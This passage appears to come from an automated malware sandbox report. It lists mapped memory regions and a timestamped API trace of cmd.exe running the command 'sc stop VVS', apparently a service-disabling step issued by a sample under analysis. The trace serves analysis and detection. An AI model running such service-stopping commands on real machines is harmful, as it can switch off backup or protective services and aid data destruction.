= "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 530 start_va = 0x75660000 end_va = 0x7574ffff entry_point = 0x75670569 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 531 start_va = 0x76430000 end_va = 0x7652ffff entry_point = 0x7644b6ed region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 532 start_va = 0x76a20000 end_va = 0x76b2ffff entry_point = 0x76a332d3 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 533 start_va = 0x76c90000 end_va = 0x76cd5fff entry_point = 0x76c97478 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 534 start_va = 0x76ce0000 end_va = 0x76d8bfff entry_point = 0x76cea472 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 535 start_va = 0x76e20000 end_va = 0x76eaffff entry_point = 0x76e36343 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 536 start_va = 0x76f00000 end_va = 0x76f9cfff entry_point = 0x76f33fd7 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\SysWOW64\\usp10.dll" (normalized: "c:\\windows\\syswow64\\usp10.dll") Region: id = 537 start_va = 0x76fa0000 end_va = 0x76fb8fff entry_point = 0x76fa4975 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 538 start_va = 0x77200000 end_va = 0x7729ffff entry_point = 0x772149e5 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 539 start_va = 0x772a0000 end_va = 0x773befff entry_point = 0x0 region_type = private name = "private_0x00000000772a0000" filename = "" Region: id = 540 start_va = 0x773c0000 end_va = 0x774b9fff entry_point = 0x0 region_type = private name = "private_0x00000000773c0000" filename = "" Region: id = 541 start_va = 0x77670000 end_va = 0x77679fff entry_point = 0x776736a0 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\SysWOW64\\lpk.dll" (normalized: "c:\\windows\\syswow64\\lpk.dll") Region: id = 542 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 543 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 633 start_va = 0x660000 end_va = 0x7e7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000660000" filename = "" Region: id = 634 start_va = 0x767d0000 end_va = 0x7689bfff entry_point = 0x767d168b region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 635 start_va = 0x768a0000 end_va = 0x768fffff entry_point = 0x768b158f region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 636 start_va = 0x30000 end_va = 0x36fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 637 start_va = 0xe0000 end_va = 0xe1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000e0000" filename = "" Region: id = 638 start_va = 0xf0000 end_va = 0xf0fff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 639 start_va = 0x100000 end_va = 0x100fff entry_point = 0x0 region_type = private name = "private_0x0000000000100000" filename = "" Region: id = 640 start_va = 0x7f0000 end_va = 0x970fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000007f0000" filename = "" Region: id = 641 start_va = 0x980000 end_va = 0x1d7ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000980000" filename = "" Region: id = 642 start_va = 0x1d80000 end_va = 0x20c2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001d80000" filename = "" Region: id = 653 start_va = 0x20d0000 end_va = 0x239efff entry_point = 0x20d0000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Thread: id = 17 os_tid = 0xa20 [0020.701] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x33fd34 | out: lpSystemTimeAsFileTime=0x33fd34*(dwLowDateTime=0x13f4a0e0, dwHighDateTime=0x1d35d7b)) [0020.702] GetCurrentProcessId () returned 0xa1c [0020.702] GetCurrentThreadId () returned 0xa20 [0020.702] GetTickCount () returned 0x144eb [0020.702] QueryPerformanceCounter (in: lpPerformanceCount=0x33fd2c | out: lpPerformanceCount=0x33fd2c*=322288017) returned 1 [0020.703] GetModuleHandleA (lpModuleName=0x0) returned 0x4a510000 [0020.703] __set_app_type (_Type=0x1) [0020.703] __p__fmode () returned 0x76d831f4 [0020.703] __p__commode () returned 0x76d831fc [0020.704] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a5321a6) returned 0x0 [0020.704] __getmainargs (in: _Argc=0x4a534238, _Argv=0x4a534240, _Env=0x4a53423c, _DoWildCard=0, _StartInfo=0x4a534140 | out: _Argc=0x4a534238, _Argv=0x4a534240, _Env=0x4a53423c) returned 0 [0020.704] GetCurrentThreadId () returned 0xa20 [0020.704] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xa20) returned 0x60 [0020.707] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76a20000 [0020.707] GetProcAddress (hModule=0x76a20000, lpProcName="SetThreadUILanguage") returned 0x76a4a84f [0020.707] SetThreadUILanguage (LangId=0x0) returned 0x409 [0020.707] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0020.707] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x33fcc4 | out: phkResult=0x33fcc4*=0x0) returned 0x2 [0020.707] VirtualQuery (in: lpAddress=0x33fcfb, lpBuffer=0x33fc94, dwLength=0x1c | out: lpBuffer=0x33fc94*(BaseAddress=0x33f000, AllocationBase=0x240000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0020.707] VirtualQuery (in: lpAddress=0x240000, lpBuffer=0x33fc94, dwLength=0x1c | out: lpBuffer=0x33fc94*(BaseAddress=0x240000, AllocationBase=0x240000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0020.707] VirtualQuery (in: lpAddress=0x241000, lpBuffer=0x33fc94, dwLength=0x1c | out: lpBuffer=0x33fc94*(BaseAddress=0x241000, AllocationBase=0x240000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0020.707] VirtualQuery (in: lpAddress=0x243000, lpBuffer=0x33fc94, dwLength=0x1c | out: lpBuffer=0x33fc94*(BaseAddress=0x243000, AllocationBase=0x240000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0020.707] VirtualQuery (in: lpAddress=0x340000, lpBuffer=0x33fc94, dwLength=0x1c | out: lpBuffer=0x33fc94*(BaseAddress=0x340000, AllocationBase=0x0, AllocationProtect=0x0, RegionSize=0xa0000, State=0x10000, Protect=0x1, Type=0x0)) returned 0x1c [0020.707] GetConsoleOutputCP () returned 0x1b5 [0020.707] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a534260 | out: lpCPInfo=0x4a534260) returned 1 [0020.708] SetConsoleCtrlHandler (HandlerRoutine=0x4a52e72a, Add=1) returned 1 [0020.708] _get_osfhandle (_FileHandle=1) returned 0x7 [0020.708] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0020.709] _get_osfhandle (_FileHandle=1) returned 0x7 [0020.709] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a5341ac | out: lpMode=0x4a5341ac) returned 1 [0020.710] _get_osfhandle (_FileHandle=1) returned 0x7 [0020.710] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0020.710] _get_osfhandle (_FileHandle=0) returned 0x3 [0020.710] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a5341b0 | out: lpMode=0x4a5341b0) returned 1 [0020.711] _get_osfhandle (_FileHandle=0) returned 0x3 [0020.711] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0020.711] GetEnvironmentStringsW () returned 0x3f2010* [0020.711] FreeEnvironmentStringsW (penv=0x3f2010) returned 1 [0020.711] GetEnvironmentStringsW () returned 0x3f2010* [0020.711] FreeEnvironmentStringsW (penv=0x3f2010) returned 1 [0020.712] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x33ec34 | out: phkResult=0x33ec34*=0x68) returned 0x0 [0020.712] RegQueryValueExW (in: hKey=0x68, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x33ec3c, lpData=0x33ec40, lpcbData=0x33ec38*=0x1000 | out: lpType=0x33ec3c*=0x0, lpData=0x33ec40*=0x0, lpcbData=0x33ec38*=0x1000) returned 0x2 [0020.712] RegQueryValueExW (in: hKey=0x68, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x33ec3c, lpData=0x33ec40, lpcbData=0x33ec38*=0x1000 | out: lpType=0x33ec3c*=0x4, lpData=0x33ec40*=0x1, lpcbData=0x33ec38*=0x4) returned 0x0 [0020.712] RegQueryValueExW (in: hKey=0x68, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x33ec3c, lpData=0x33ec40, lpcbData=0x33ec38*=0x1000 | out: lpType=0x33ec3c*=0x0, lpData=0x33ec40*=0x1, lpcbData=0x33ec38*=0x1000) returned 0x2 [0020.712] RegQueryValueExW (in: hKey=0x68, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x33ec3c, lpData=0x33ec40, lpcbData=0x33ec38*=0x1000 | out: lpType=0x33ec3c*=0x4, lpData=0x33ec40*=0x0, lpcbData=0x33ec38*=0x4) returned 0x0 [0020.712] RegQueryValueExW (in: hKey=0x68, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x33ec3c, lpData=0x33ec40, lpcbData=0x33ec38*=0x1000 | out: lpType=0x33ec3c*=0x4, lpData=0x33ec40*=0x40, lpcbData=0x33ec38*=0x4) returned 0x0 [0020.712] RegQueryValueExW (in: hKey=0x68, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x33ec3c, lpData=0x33ec40, lpcbData=0x33ec38*=0x1000 | out: lpType=0x33ec3c*=0x4, lpData=0x33ec40*=0x40, lpcbData=0x33ec38*=0x4) returned 0x0 [0020.712] RegQueryValueExW (in: hKey=0x68, lpValueName="AutoRun", lpReserved=0x0, lpType=0x33ec3c, lpData=0x33ec40, lpcbData=0x33ec38*=0x1000 | out: lpType=0x33ec3c*=0x0, lpData=0x33ec40*=0x40, lpcbData=0x33ec38*=0x1000) returned 0x2 [0020.712] RegCloseKey (hKey=0x68) returned 0x0 [0020.712] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x33ec34 | out: phkResult=0x33ec34*=0x68) returned 0x0 [0020.712] RegQueryValueExW (in: hKey=0x68, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x33ec3c, lpData=0x33ec40, lpcbData=0x33ec38*=0x1000 | out: lpType=0x33ec3c*=0x0, lpData=0x33ec40*=0x40, lpcbData=0x33ec38*=0x1000) returned 0x2 [0020.712] RegQueryValueExW (in: hKey=0x68, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x33ec3c, lpData=0x33ec40, lpcbData=0x33ec38*=0x1000 | out: lpType=0x33ec3c*=0x4, lpData=0x33ec40*=0x1, lpcbData=0x33ec38*=0x4) returned 0x0 [0020.712] RegQueryValueExW (in: hKey=0x68, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x33ec3c, lpData=0x33ec40, lpcbData=0x33ec38*=0x1000 | out: lpType=0x33ec3c*=0x0, lpData=0x33ec40*=0x1, lpcbData=0x33ec38*=0x1000) returned 0x2 [0020.712] RegQueryValueExW (in: hKey=0x68, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x33ec3c, lpData=0x33ec40, lpcbData=0x33ec38*=0x1000 | out: lpType=0x33ec3c*=0x4, lpData=0x33ec40*=0x0, lpcbData=0x33ec38*=0x4) returned 0x0 [0020.712] RegQueryValueExW (in: hKey=0x68, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x33ec3c, lpData=0x33ec40, lpcbData=0x33ec38*=0x1000 | out: lpType=0x33ec3c*=0x4, lpData=0x33ec40*=0x9, lpcbData=0x33ec38*=0x4) returned 0x0 [0020.712] RegQueryValueExW (in: hKey=0x68, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x33ec3c, lpData=0x33ec40, lpcbData=0x33ec38*=0x1000 | out: lpType=0x33ec3c*=0x4, lpData=0x33ec40*=0x9, lpcbData=0x33ec38*=0x4) returned 0x0 [0020.713] RegQueryValueExW (in: hKey=0x68, lpValueName="AutoRun", lpReserved=0x0, lpType=0x33ec3c, lpData=0x33ec40, lpcbData=0x33ec38*=0x1000 | out: lpType=0x33ec3c*=0x0, lpData=0x33ec40*=0x9, lpcbData=0x33ec38*=0x1000) returned 0x2 [0020.713] RegCloseKey (hKey=0x68) returned 0x0 [0020.713] time (in: timer=0x0 | out: timer=0x0) returned 0x5a0b3db4 [0020.713] srand (_Seed=0x5a0b3db4) [0020.713] GetCommandLineW () returned="\"C:\\Windows\\System32\\cmd.exe\" /C sc stop VVS" [0020.713] GetCommandLineW () returned="\"C:\\Windows\\System32\\cmd.exe\" /C sc stop VVS" [0020.713] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a535260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0020.714] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x3f2018, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")) returned 0x1b [0020.714] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a540640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0020.714] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a540640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0020.714] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a540640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0020.714] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0020.714] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0020.714] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0020.714] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0020.714] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0020.714] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0020.714] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0020.714] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0020.714] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0020.714] GetEnvironmentStringsW () returned 0x3f2228* [0020.715] FreeEnvironmentStringsW (penv=0x3f2228) returned 1 [0020.715] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a540640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0020.715] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a540640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0020.715] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0020.715] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0020.715] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0020.715] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0020.716] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0020.716] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0020.716] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0020.716] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0020.716] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x33fa00 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0020.716] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", nBufferLength=0x104, lpBuffer=0x33fa00, lpFilePart=0x33f9fc | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x33f9fc*="Desktop") returned 0x25 [0020.716] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0020.716] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x33f77c | out: lpFindFileData=0x33f77c) returned 0x3f1e90 [0020.716] FindClose (in: hFindFile=0x3f1e90 | out: hFindFile=0x3f1e90) returned 1 [0020.717] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFindFileData=0x33f77c | out: lpFindFileData=0x33f77c) returned 0x3f1e90 [0020.717] FindClose (in: hFindFile=0x3f1e90 | out: hFindFile=0x3f1e90) returned 1 [0020.717] _wcsnicmp (_String1="5P5NRG~1", _String2="5p5NrGJn0jS HALPmcxz", _MaxCount=0x14) returned 20 [0020.717] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFindFileData=0x33f77c | out: lpFindFileData=0x33f77c) returned 0x3f1e90 [0020.717] FindClose (in: hFindFile=0x3f1e90 | out: hFindFile=0x3f1e90) returned 1 [0020.717] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0020.717] SetCurrentDirectoryW (lpPathName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 1 [0020.717] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 1 [0020.717] GetEnvironmentStringsW () returned 0x3f4098* [0020.717] FreeEnvironmentStringsW (penv=0x3f4098) returned 1 [0020.717] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a535260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0020.718] GetConsoleOutputCP () returned 0x1b5 [0020.718] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a534260 | out: lpCPInfo=0x4a534260) returned 1 [0020.718] GetUserDefaultLCID () returned 0x409 [0020.718] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a534950, cchData=8 | out: lpLCData=":") returned 2 [0020.718] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x33fb40, cchData=128 | out: lpLCData="0") returned 2 [0020.718] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x33fb40, cchData=128 | out: lpLCData="0") returned 2 [0020.719] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x33fb40, cchData=128 | out: lpLCData="1") returned 2 [0020.719] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a534940, cchData=8 | out: lpLCData="/") returned 2 [0020.719] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a534d80, cchData=32 | out: lpLCData="Mon") returned 4 [0020.719] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a534d40, cchData=32 | out: lpLCData="Tue") returned 4 [0020.719] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a534d00, cchData=32 | out: lpLCData="Wed") returned 4 [0020.719] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a534cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0020.719] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a534c80, cchData=32 | out: lpLCData="Fri") returned 4 [0020.719] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a534c40, cchData=32 | out: lpLCData="Sat") returned 4 [0020.719] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a534c00, cchData=32 | out: lpLCData="Sun") returned 4 [0020.719] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a534930, cchData=8 | out: lpLCData=".") returned 2 [0020.719] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a534920, cchData=8 | out: lpLCData=",") returned 2 [0020.719] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0020.721] GetConsoleTitleW (in: lpConsoleTitle=0x3f2da0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b [0020.722] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76a20000 [0020.722] GetProcAddress (hModule=0x76a20000, lpProcName="CopyFileExW") returned 0x76a53b92 [0020.722] GetProcAddress (hModule=0x76a20000, lpProcName="IsDebuggerPresent") returned 0x76a34a5d [0020.722] GetProcAddress (hModule=0x76a20000, lpProcName="SetConsoleInputExeNameW") returned 0x76a4a79d [0020.723] _wcsicmp (_String1="sc", _String2=")") returned 74 [0020.723] _wcsicmp (_String1="FOR", _String2="sc") returned -13 [0020.723] _wcsicmp (_String1="FOR/?", _String2="sc") returned -13 [0020.723] _wcsicmp (_String1="IF", _String2="sc") returned -10 [0020.723] _wcsicmp (_String1="IF/?", _String2="sc") returned -10 [0020.723] _wcsicmp (_String1="REM", _String2="sc") returned -1 [0020.723] _wcsicmp (_String1="REM/?", _String2="sc") returned -1 [0020.724] GetConsoleTitleW (in: lpConsoleTitle=0x33f838, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b [0020.724] _wcsicmp (_String1="sc", _String2="DIR") returned 15 [0020.724] _wcsicmp (_String1="sc", _String2="ERASE") returned 14 [0020.724] _wcsicmp (_String1="sc", _String2="DEL") returned 15 [0020.724] _wcsicmp (_String1="sc", _String2="TYPE") returned -1 [0020.724] _wcsicmp (_String1="sc", _String2="COPY") returned 16 [0020.724] _wcsicmp (_String1="sc", _String2="CD") returned 16 [0020.724] _wcsicmp (_String1="sc", _String2="CHDIR") returned 16 [0020.724] _wcsicmp (_String1="sc", _String2="RENAME") returned 1 [0020.724] _wcsicmp (_String1="sc", _String2="REN") returned 1 [0020.724] _wcsicmp (_String1="sc", _String2="ECHO") returned 14 [0020.724] _wcsicmp (_String1="sc", _String2="SET") returned -2 [0020.724] _wcsicmp (_String1="sc", _String2="PAUSE") returned 3 [0020.725] _wcsicmp (_String1="sc", _String2="DATE") returned 15 [0020.725] _wcsicmp (_String1="sc", _String2="TIME") returned -1 [0020.725] _wcsicmp (_String1="sc", _String2="PROMPT") returned 3 [0020.725] _wcsicmp (_String1="sc", _String2="MD") returned 6 [0020.725] _wcsicmp (_String1="sc", _String2="MKDIR") returned 6 [0020.725] _wcsicmp (_String1="sc", _String2="RD") returned 1 [0020.725] _wcsicmp (_String1="sc", _String2="RMDIR") returned 1 [0020.725] _wcsicmp (_String1="sc", _String2="PATH") returned 3 [0020.725] _wcsicmp (_String1="sc", _String2="GOTO") returned 12 [0020.725] _wcsicmp (_String1="sc", _String2="SHIFT") returned -5 [0020.725] _wcsicmp (_String1="sc", _String2="CLS") returned 16 [0020.725] _wcsicmp (_String1="sc", _String2="CALL") returned 16 [0020.725] _wcsicmp (_String1="sc", _String2="VERIFY") returned -3 [0020.725] _wcsicmp (_String1="sc", _String2="VER") returned -3 [0020.725] _wcsicmp (_String1="sc", _String2="VOL") returned -3 [0020.725] _wcsicmp (_String1="sc", _String2="EXIT") returned 14 [0020.725] _wcsicmp (_String1="sc", _String2="SETLOCAL") returned -2 [0020.725] _wcsicmp (_String1="sc", _String2="ENDLOCAL") returned 14 [0020.726] _wcsicmp (_String1="sc", _String2="TITLE") returned -1 [0020.726] _wcsicmp (_String1="sc", _String2="START") returned -17 [0020.726] _wcsicmp (_String1="sc", _String2="DPATH") returned 15 [0020.726] _wcsicmp (_String1="sc", _String2="KEYS") returned 8 [0020.726] _wcsicmp (_String1="sc", _String2="MOVE") returned 6 [0020.726] _wcsicmp (_String1="sc", _String2="PUSHD") returned 3 [0020.726] _wcsicmp (_String1="sc", _String2="POPD") returned 3 [0020.726] _wcsicmp (_String1="sc", _String2="ASSOC") returned 18 [0020.726] _wcsicmp (_String1="sc", _String2="FTYPE") returned 13 [0020.726] _wcsicmp (_String1="sc", _String2="BREAK") returned 17 [0020.726] _wcsicmp (_String1="sc", _String2="COLOR") returned 16 [0020.726] _wcsicmp (_String1="sc", _String2="MKLINK") returned 6 [0020.726] _wcsicmp (_String1="sc", _String2="DIR") returned 15 [0020.726] _wcsicmp (_String1="sc", _String2="ERASE") returned 14 [0020.726] _wcsicmp (_String1="sc", _String2="DEL") returned 15 [0020.726] _wcsicmp (_String1="sc", _String2="TYPE") returned -1 [0020.726] _wcsicmp (_String1="sc", _String2="COPY") returned 16 [0020.726] _wcsicmp (_String1="sc", _String2="CD") returned 16 [0020.726] _wcsicmp (_String1="sc", _String2="CHDIR") returned 16 [0020.726] _wcsicmp (_String1="sc", _String2="RENAME") returned 1 [0020.726] _wcsicmp (_String1="sc", _String2="REN") returned 1 [0020.726] _wcsicmp (_String1="sc", _String2="ECHO") returned 14 [0020.726] _wcsicmp (_String1="sc", _String2="SET") returned -2 [0020.726] _wcsicmp (_String1="sc", _String2="PAUSE") returned 3 [0020.726] _wcsicmp (_String1="sc", _String2="DATE") returned 15 [0020.726] _wcsicmp (_String1="sc", _String2="TIME") returned -1 [0020.726] _wcsicmp (_String1="sc", _String2="PROMPT") returned 3 [0020.726] _wcsicmp (_String1="sc", _String2="MD") returned 6 [0020.726] _wcsicmp (_String1="sc", _String2="MKDIR") returned 6 [0020.726] _wcsicmp (_String1="sc", _String2="RD") returned 1 [0020.726] _wcsicmp (_String1="sc", _String2="RMDIR") returned 1 [0020.726] _wcsicmp (_String1="sc", _String2="PATH") returned 3 [0020.726] _wcsicmp (_String1="sc", _String2="GOTO") returned 12 [0020.726] _wcsicmp (_String1="sc", _String2="SHIFT") returned -5 [0020.726] _wcsicmp (_String1="sc", _String2="CLS") returned 16 [0020.726] _wcsicmp (_String1="sc", _String2="CALL") returned 16 [0020.726] _wcsicmp (_String1="sc", _String2="VERIFY") returned -3 [0020.726] _wcsicmp (_String1="sc", _String2="VER") returned -3 [0020.726] _wcsicmp (_String1="sc", _String2="VOL") returned -3 [0020.726] _wcsicmp (_String1="sc", _String2="EXIT") returned 14 [0020.726] _wcsicmp (_String1="sc", _String2="SETLOCAL") returned -2 [0020.726] _wcsicmp (_String1="sc", _String2="ENDLOCAL") returned 14 [0020.727] _wcsicmp (_String1="sc", _String2="TITLE") returned -1 [0020.727] _wcsicmp (_String1="sc", _String2="START") returned -17 [0020.727] _wcsicmp (_String1="sc", _String2="DPATH") returned 15 [0020.727] _wcsicmp (_String1="sc", _String2="KEYS") returned 8 [0020.727] _wcsicmp (_String1="sc", _String2="MOVE") returned 6 [0020.727] _wcsicmp (_String1="sc", _String2="PUSHD") returned 3 [0020.727] _wcsicmp (_String1="sc", _String2="POPD") returned 3 [0020.727] _wcsicmp (_String1="sc", _String2="ASSOC") returned 18 [0020.727] _wcsicmp (_String1="sc", _String2="FTYPE") returned 13 [0020.727] _wcsicmp (_String1="sc", _String2="BREAK") returned 17 [0020.727] _wcsicmp (_String1="sc", _String2="COLOR") returned 16 [0020.727] _wcsicmp (_String1="sc", _String2="MKLINK") returned 6 [0020.727] _wcsicmp (_String1="sc", _String2="FOR") returned 13 [0020.727] _wcsicmp (_String1="sc", _String2="IF") returned 10 [0020.727] _wcsicmp (_String1="sc", _String2="REM") returned 1 [0020.727] _wcsnicmp (_String1="sc", _String2="cmd ", _MaxCount=0x4) returned 16 